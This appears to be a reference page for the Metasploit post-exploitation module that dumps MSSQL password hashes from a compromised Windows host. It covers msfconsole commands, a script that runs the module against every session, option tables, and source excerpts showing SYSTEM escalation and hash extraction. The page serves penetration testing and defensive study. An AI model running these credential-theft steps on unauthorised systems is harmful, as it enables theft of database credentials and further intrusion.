Windows Gather Local SQL Server Hash Dump - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/mssql_local_hashdump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Local SQL Server Hash Dump
Module: post/windows/gather/credentials/mssql_local_hashdump
Source code: modules/post/windows/gather/credentials/mssql_local_hashdump.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts the usernames and password hashes from an MSSQL server and stores them as loot. It uses the same technique in mssql_local_auth_bypass.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/mssql_local_hashdump

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/mssql_local_hashdump
msf post(mssql_local_hashdump) > show options
    ... show and set options ...
msf post(mssql_local_hashdump) > set SESSION session-id
msf post(mssql_local_hashdump) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/mssql_local_hashdump")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/mssql_local_hashdump post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/mssql_local_hashdump

msf6 post(windows/gather/credentials/mssql_local_hashdump) > show info

       Name: Windows Gather Local SQL Server Hash Dump
     Module: post/windows/gather/credentials/mssql_local_hashdump
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Mike Manzotti <[email protected]>
  nullbind

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  INSTANCE                   no        Name of target SQL Server instance
  SESSION                    yes       The session to run this module on.

Description:
  This module extracts the usernames and password hashes from an MSSQL 
  server and stores them as loot. It uses the same technique in 
  mssql_local_auth_bypass.

References:
  https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes

Module Options


This is a complete list of options available in the windows/gather/credentials/mssql_local_hashdump post exploitation module:

msf6 post(windows/gather/credentials/mssql_local_hashdump) > show options

Module options (post/windows/gather/credentials/mssql_local_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   INSTANCE                   no        Name of target SQL Server instance
   SESSION                    yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/mssql_local_hashdump post exploitation module:

msf6 post(windows/gather/credentials/mssql_local_hashdump) > show advanced

Module advanced options (post/windows/gather/credentials/mssql_local_hashdump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/mssql_local_hashdump module can do:

msf6 post(windows/gather/credentials/mssql_local_hashdump) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/mssql_local_hashdump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/mssql_local_hashdump) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to identify a SQL client


Here is a relevant code snippet related to the "Unable to identify a SQL client" error message:

44:	    # Display target
45:	    print_status("Running module against #{sysinfo['Computer']}")
46:	
47:	    # Identify available native SQL client
48:	    get_sql_client
49:	    fail_with(Failure::Unknown, 'Unable to identify a SQL client') unless @sql_client
50:	
51:	    # Get LocalSystem privileges
52:	    system_status = get_system
53:	    fail_with(Failure::Unknown, 'Unable to get SYSTEM') unless system_status
54:	

Unable to get SYSTEM


Here is a relevant code snippet related to the "Unable to get SYSTEM" error message:

48:	    get_sql_client
49:	    fail_with(Failure::Unknown, 'Unable to identify a SQL client') unless @sql_client
50:	
51:	    # Get LocalSystem privileges
52:	    system_status = get_system
53:	    fail_with(Failure::Unknown, 'Unable to get SYSTEM') unless system_status
54:	
55:	    begin
56:	      service = check_for_sqlserver(instance)
57:	      fail_with(Failure::Unknown, 'Unable to identify MSSQL Service') unless service
58:	

Unable to identify MSSQL Service


Here is a relevant code snippet related to the "Unable to identify MSSQL Service" error message:

52:	    system_status = get_system
53:	    fail_with(Failure::Unknown, 'Unable to get SYSTEM') unless system_status
54:	
55:	    begin
56:	      service = check_for_sqlserver(instance)
57:	      fail_with(Failure::Unknown, 'Unable to identify MSSQL Service') unless service
58:	
59:	      print_status("Identified service '#{service[:display]}', PID: #{service[:pid]}")
60:	      instance_name = service[:display].gsub('SQL Server (', '').gsub(')', '').lstrip.rstrip
61:	
62:	      begin

MSSQL version not found


Here is a relevant code snippet related to the "MSSQL version not found" error message:

85:	    version_year = get_version_array.first.strip.slice(/\d\d\d\d/)
86:	    if version_year
87:	      vprint_status("MSSQL version found: #{version_year}")
88:	      return version_year
89:	    else
90:	      vprint_error("MSSQL version not found")
91:	    end
92:	  end
93:	
94:	  def get_sql_hash(instance_name)
95:	    version_year = get_sql_version(instance_name)

Unable to determine MSSQL Version


Here is a relevant code snippet related to the "Unable to determine MSSQL Version" error message:

103:	      query = mssql_2k5_password_hashes
104:	    when "2012", "2014"
105:	      hash_type = "mssql12"
106:	      query = mssql_2k5_password_hashes
107:	    else
108:	      fail_with(Failure::Unknown, "Unable to determine MSSQL Version")
109:	    end
110:	
111:	    print_status("Attempting to get password hashes...")
112:	
113:	    res = run_sql(query, instance_name)

Unable to retrieve hashes


Here is a relevant code snippet related to the "Unable to retrieve hashes" error message:

121:	      end
122:	      hash_array = res.split("\r\n").grep(/0x/)
123:	
124:	      store_hashes(hash_array, hash_type)
125:	    else
126:	      fail_with(Failure::Unknown, "Unable to retrieve hashes")
127:	    end
128:	  end
129:	
130:	  def store_hashes(hash_array, hash_type)
131:	    # Save data

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Mike Manzotti <mike.manzotti[at]dionach.com>
  • nullbind

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.